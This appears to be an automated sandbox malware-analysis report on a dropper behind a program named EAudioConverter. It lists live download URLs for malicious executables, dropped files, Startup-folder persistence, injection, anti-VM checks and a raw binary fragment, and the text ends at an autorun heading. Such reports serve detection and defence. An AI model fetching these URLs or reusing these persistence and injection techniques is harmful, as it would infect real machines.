__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134332416 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134332416 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134336512 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134336512 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134340608 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134340608 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134344704 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134344704 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134348800 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134348800 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134352896 registers.ebp: 1638072 registers.edx: 0 registers.ebx: 947526991 registers.esi: 134352896 registers.ecx: 1638264	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://85.217.144.143/files/My2.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://pic.himanfast.com/order/tuc15.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://dl2-broomcleaner.online/InstallSetup6.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://galandskiyher5.com/downloads/toolspub1.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
suspicious_features	GET method with no useragent header	suspicious_request	GET https://yip.su/RNWPd.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/E0rY26ni
suspicious_features	GET method with no useragent header	suspicious_request	GET https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

Performs some HTTP requests (9 events)

request	GET http://85.217.144.143/files/My2.exe
request	GET http://pic.himanfast.com/order/tuc15.exe
request	GET http://dl2-broomcleaner.online/InstallSetup6.exe
request	GET http://galandskiyher5.com/downloads/toolspub1.exe
request	GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET https://yip.su/RNWPd.exe
request	GET https://pastebin.com/raw/E0rY26ni
request	GET https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

Resolves a suspicious Top Level Domain (TLD) (2 events)

domain	yip.su				description	Soviet Union domain TLD
domain	gobs2or.top				description	Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (26 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00442000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00475000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00466000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00467000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 77824 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008de000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2312 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2348 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2348 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2348 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00360000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (4 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Oct. 30, 2023, 7:43 a.m.	total_number_of_free_bytes: 9884348416 free_bytes_available: 9884348416 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Oct. 30, 2023, 7:43 a.m.	total_number_of_free_bytes: 9933283328 free_bytes_available: 9933283328 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Oct. 30, 2023, 7:43 a.m.	total_number_of_free_bytes: 9985875968 free_bytes_available: 9985875968 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Oct. 30, 2023, 7:43 a.m.	total_number_of_free_bytes: 9985875968 free_bytes_available: 9985875968 root_path: C: total_number_of_bytes: 34252779520	1	1

Creates executable files on the filesystem (25 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2j1wOSyRRZlvfDus5qwAvi0Z.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X5tZBxWiKmOFIzxOhnZu8gKe.bat
file	C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_iscrypt.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z3O1vJkq2hH3jlVWjFUzzopv.bat
file	C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe
file	C:\Users\test22\AppData\Local\fDn52MXZL3xUBHNlda9kPB7t.exe
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_isdecmp.dll
file	C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe
file	C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe
file	C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe
file	C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe
file	C:\Users\test22\AppData\Local\Temp\Opera_installer_2310300223001252924.dll
file	C:\Users\test22\AppData\Local\qpMRODTTscULMAsehBVmoqbv.exe
file	C:\Users\test22\AppData\Local\hqiwHPV4Ucu0oCL4hjL8yJzq.exe
file	C:\Users\test22\Pictures\OiGV5idG6Va0IewnFZGxvbaJ.exe
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gv7KUB2WXOGafSmmePHVuGjD.bat
file	C:\Users\test22\AppData\Local\Temp\Broom.exe
file	C:\Users\test22\Pictures\Opera_installer_2310300223002032924.dll
file	C:\Users\test22\AppData\Local\B4fsVAdLYdgjzbiuYiotk58J.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BKnZQWmwI7yOAr8qAggqu69D.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Re18YuYGdBpHTOA8LxxtyXKY.bat
file	C:\Users\test22\AppData\Local\q8CjWl6LNdrc9xQUpIpIKAhH.exe
file	C:\Users\test22\AppData\Local\ke7RnI6ELkKEGagplaXI7AEE.exe

Creates a suspicious process (1 event)

cmdline

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "EAC1029-3"

Drops an executable to the user AppData folder (16 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_RegDLL.tmp
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\Broom.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file	C:\Users\test22\AppData\Local\hqiwHPV4Ucu0oCL4hjL8yJzq.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file	C:\Users\test22\AppData\Local\fDn52MXZL3xUBHNlda9kPB7t.exe
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_isdecmp.dll
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_iscrypt.dll
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\is-IPHDL.tmp\bCFxiw2ka2ZDRK02w3xqyvKh.tmp

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 30, 2023, 7:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\OiGV5idG6Va0IewnFZGxvbaJ.exe parameters: filepath: C:\Users\test22\Pictures\OiGV5idG6Va0IewnFZGxvbaJ.exe		0
ShellExecuteExW Oct. 30, 2023, 7:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe parameters: filepath: C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe	1	1
ShellExecuteExW Oct. 30, 2023, 7:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe parameters: filepath: C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe	1	1
ShellExecuteExW Oct. 30, 2023, 7:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe parameters: filepath: C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe	1	1
ShellExecuteExW Oct. 30, 2023, 7:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe parameters: filepath: C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe	1	1
ShellExecuteExW Oct. 30, 2023, 7:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe parameters: --silent --allusers=0 filepath: C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 30, 2023, 7:42 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process installutil.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Oct. 30, 2023, 7:42 a.m.	buffer: HTTP/1.1 200 OK Date: Sun, 29 Oct 2023 22:42:59 GMT Content-Type: application/octet-stream Content-Length: 3002749 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc15.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: max-age=120, must-revalidate Pragma: public CF-Cache-Status: EXPIRED Last-Modified: Sun, 29 Oct 2023 18:55:31 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y4rn%2B%2BZO34LOvMSB4gS1IoH0DOTq0ojysMQqTD9OvNZ%2BTs6biyHmsrwlJ145ESDTx%2FLgyy%2F0c3e5sBjlMKQyNOjdspOaC3n9zsxM458mVpXkmM0v3zzceeysei3m42UdHX%2F%2BGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81deef4f1c927d82-LAX alt-svc: h3=":443"; ma=86400 MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PELóß>eàF$°@@@ÐP ,ðCODED `DATAL°@ÀBSSLÀÀ.idataP Ð @À.tlsà¦À.rdatað¦@P.reloc´@P.rsrc,,¨@P@Þ@P string<@m@Ä)@¬(@Ô(@)@$)@Free0)@InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName(@ClassNameIs¨(@ClassParentÀ)@ ClassInfoø(@InstanceSize°)@InheritsFromÈ)@Dispatchð)@ MethodAddress<@ MethodNamex@FieldAddressÄ)@DefaultHandler¬(@NewInstanceÔ(@FreeInstanceTObject@Ã@ÿ% Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%(Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%üÐ@Àÿ%øÐ@Àÿ%ôÐ@Àÿ%ðÐ@Àÿ%ìÐ@Àÿ%èÐ@Àÿ%äÐ@Àÿ%àÐ@Àÿ%ÜÐ@Àÿ%ØÐ@Àÿ%ÔÐ@Àÿ%@Ñ@Àÿ%<Ñ@Àÿ%8Ñ@Àÿ%4Ñ@Àÿ%0Ñ@Àÿ%ÐÐ@Àÿ%ÌÐ@Àÿ%ÈÐ@Àÿ%ÄÐ@Àÿ%ÀÐ@Àÿ%¼Ð@Àÿ%¸Ð@Àÿ%´Ð@ÀSV¾8Ä@>u:hDjè¨ÿÿÿÈÉu3À^[Ã¡4Ä@ 4Ä@3ÒÂÀDÁBúduì^[Ã@ÃÀSVòØèÿÿÿÀu3À^[ÃPVPXB°^[ÃP Q8Ä@£8Ä@ÃSVWUQñ$è]$PV;CÐS;uÃè·ÿÿÿCCFëV;Âu ÃèÿÿÿCFß;ëuÂÖÅèUÿÿÿÀu3ÀZ]_^[Ã@SVWUÄøØû2C;ðrlÎJèk;Íw^;ðuBCB)C{uDÃè5ÿÿÿë; rÎø{;Ïu)së& J$+ù\|$+ÐSÔÃèÐ received: 2920 socket: 1628	1	2920	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation

Yara rule detected in process memory (14 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (4 events)

Time & API	Arguments	Return
RegOpenKeyExA Oct. 30, 2023, 7:42 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1	2
RegOpenKeyExA Oct. 30, 2023, 7:42 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1	2
RegOpenKeyExA Oct. 30, 2023, 7:42 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1	2
RegOpenKeyExA Oct. 30, 2023, 7:42 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\EAudioConverter_is1	2

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "EAC1029-3"

Communicates with host for which no DNS query was performed (1 event)

host

85.217.144.143

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000000e8	1	0	0
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2812 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1	0	0

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Installs itself for autorun at Windows startup (6 events)
